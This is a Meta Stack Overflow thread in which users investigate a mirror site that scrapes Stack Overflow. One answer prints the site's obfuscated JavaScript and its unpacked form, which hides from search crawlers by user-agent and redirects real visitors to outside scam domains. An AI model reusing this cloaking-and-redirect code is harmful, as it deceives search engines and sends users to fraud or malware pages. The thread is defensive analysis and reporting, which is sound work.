# Possible Stack Overflow phishing site?

Tags: discussion

I think I caught a phish of Stack Overflow when I was trying to provide answers.  I noticed the url failed to redirect to login page.  When I looked at the url it wasn't to the real Stack Overflow:

> `http://stackoverflow.sehknows.com/questions/25499303/saving-data-in-to-2-separate-tables-and-displaying-it-by-userid`

The correct url:

> `http://stackoverflow.com/questions/25499303/saving-data-in-to-2-separate-tables-and-displaying-it-by-userid`

Let's watch out for this phisher and bring this down right away.

Comment: just flag it so that moderators can look into your concern

Comment: love that band.

Comment: it does not look like a phishing attempt, but to me it look like a proxy/cname to real stackoverflow, perhaps for those who can not access stackoverflow in their region

Comment: It's just a mirror of Stack Overflow. The login, signup, etc. pages are all missing from the mirror.

Comment: Where did you click said URL? On SO itself? Check your machine for spyware.

Comment: Interesting, if I click the "phising" link I'm being redirected over four pages to a site telling me I've won something.

Comment: @wumm: What did you win? A chance to re-install your machine from scratch? ;)

Comment: @TheBlueDog Oh no. I would have won vouchers for some supermarkets if I've had answered a question: "Are you female or male?" But I did not bother telling them anything so I didn't won anything. Not even free spam mails...

Comment: Since the site is not just a clone and is actively harmful and malicious, I went ahead and [filled out the form with Google to report it as malicious](https://www.google.com/safebrowsing/report_badware/). Hopefully they will block it from appearing in further results until Stack Exchange deals with it more thoroughly.

Answer (score 34):

At the top of the source when I fetch that page, I can see the following JS code:

```
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+
29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=funct
ion(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0 7=9.e
(9.m()*(1+1));0 2=[\'a://8.j.3\',\'a://8.k.3\'];0 5=2[7];0 6=n h(\'o|4 g c|b-4|d/f|l|z|p|H|D|I|C!J-E|F|G|B|A|t s\',
\'i\');r(!6.q(u.v)){y.x.w=5}',46,46,'var||sites|com|Google|site|pattern|key|www|Math|http|Mediapartners|Preview|web
|floor|snippet|Web|RegExp||madaenoire|shkenows|FeedFetcher|random|new|bot|bingpreview|test|if|Jeeves|Ask|navigator|
userAgent|href|location|window|spider|facebookplatform|facebookexternalhit|Y|crawler|BSC|Yandex|ia_archiver|slurp|Y
ahooCacheSystem|'.split('|'),0,{}))
```

I ran that through [a generic JS unpacker I found at random](http://www.jsunpack.jeek.org/dec/go?) and it was able to extract the following:

```
var key=Math.floor(Math.random()*(1+1));
var sites=['http://www.madaenoire.com','http://www.shkenows.com'];
var site=sites[key];
var pattern=new RegExp('bot|Google Web Preview|Mediapartners-Google|web/snippet|FeedFetcher|spider|bingpreview|slurp|crawler|YahooCacheSystem|Y!J-BSC|Yandex|ia_archiver|facebookexternalhit|facebookplatform|Ask Jeeves','i');
if(!pattern.test(navigator.userAgent)) {
    window.location.href=site
}
```

So, if you have a user-agent string indicating you're some kind of bot (particularly a search engine or social media spider), the JS does nothing, meaning indexes list the fake site. If you go to it with a normal browser, however, you get redirected at random to one of two sites, which I doubt have your career progression as a programmer as their number 1 goal.

Comment: That explains why the site appears in google but it displays only ads to users.

Comment: Report that site to google.

Answer (score 15):

Its usage of data may be CC-compliant, but I didn't stay on the page long enough to see if it was properly attributed. The reason? I was quickly redirected to:

[image]

Followed by...

[image]

<sub>Despite the official-looking box, this has nothing to do with Chrome.</sub>

This doesn't mean 100% that the site is malicious, but (if nothing else) they are compromised and unsafe to visit. If it is showing up in Google results, it is a nuisance at best (you can't get anything useful from the site due the immediate redirect) and harmful at worst.

[There is a documented process for reporting "clone" sites](https://meta.stackexchange.com/questions/200177/updated-procedure-for-reporting-scrapers). I'd say this situation—even though it goes beyond just cloning—can still be handled by that process, i.e. report it to the staff.

Comment: Yeah, the same happened to me. First the site told me about "updates". After I again opened the link I had been told that I've won something. I don't believe that's just a mirror.

Comment: @wumm, so .. did you win a free Chrome install? A life long malbot infection? What was it? I want one too!

Comment: @Jongware It wasn't that interesting just vouchers for supermarkets if I would have told them whether I was male, as i told "the blue" above.

Comment: *"There is a documented process for dealing with "clone" sites."* - I somewhat disagree. If anyone is going to profit from Stack Overflow as a whole, then that should be Stack Overflow. Its different than borrowing a question or answer on occasion and enjoying additional traffic because of it. [I'd pull the trigger on them quickly](http://meta.stackexchange.com/a/200178/173448), especially when they are phishing visitors.

Comment: @jww - I meant that there is a documented process for *reporting* (and I updated that line of my answer). I think reporting it to the SE staff still is the best resolution, though how they handle it may be different than the usual scrapers since this has actively harmful content.

Answer (score 2):

<strike>It does not look like a phishing attempt, but to me it look like a proxy to real Stack Overflow, perhaps for those who can not access Stack Overflow in their region.</strike>

> [Thanks to @imsop](https://meta.stackoverflow.com/questions/271305/possible-stack-overflow-phishing-site/271363#271363) for discovering the hidden secret. seems like because of adblock installed on my browser it was not redirected to any ad. it is definitely an attempt to mirror the site for various reasons.

The domain is registered in China, see [who.is - sehknows.com](http://who.is/whois/sehknows.com) for the same.

It seems like the site is unavailable in some particular region (perhaps Guangdong, China), where this domain's registrar belongs to. The domain has been registered recently on 31-Jul-2014.

<strike>In short people seems to like stackoverflow, and they are trying make the site available to themselves.However if required by stackoverflow a written consent should have been acquired from Stack Overflow before starting any such proxy site.</strike>

Also a notice could have been placed on the proxy site to show that it is a proxy, or perhaps stating that this site is `Powered by Stack Overflow`.

In short such mirror websites seems to be making money from the Stack Overflow's content.

Comment: For once, I think you're wrong to jump to an assumption of good faith. The most common reason to proxy, clone, or imitate a popular site is to misdirect users for profit or criminal gain. As others have pointed out, the site (perhaps at random, perhaps with some targeting mechanism) redirects to various shady advertising pages and worse.

Answer (score -2):

This site has exact page as SO. 
http://lianxike.top/questions/tagged/ionic2?sort=votes&pageSize=50

But it shows ads every time user clicks on a link.

At first I wondered whether SO started selling ads. :P

It is being shown in google top results also.

[image]

Should SO take action to prevent these kind of [phishing attacks](http://lianxike.top/users/login?ssrc=head&returnurl=http%3A%2F%2Fstackoverflow.com%2Fquestions%2Ftagged%2Fionic2%3Fsort%3Dvotes%26pagesize%3D50)?

Comment: Report this following these guidelines: http://meta.stackexchange.com/questions/200177/a-site-or-scraper-is-copying-content-from-stack-exchange-what-do-i-do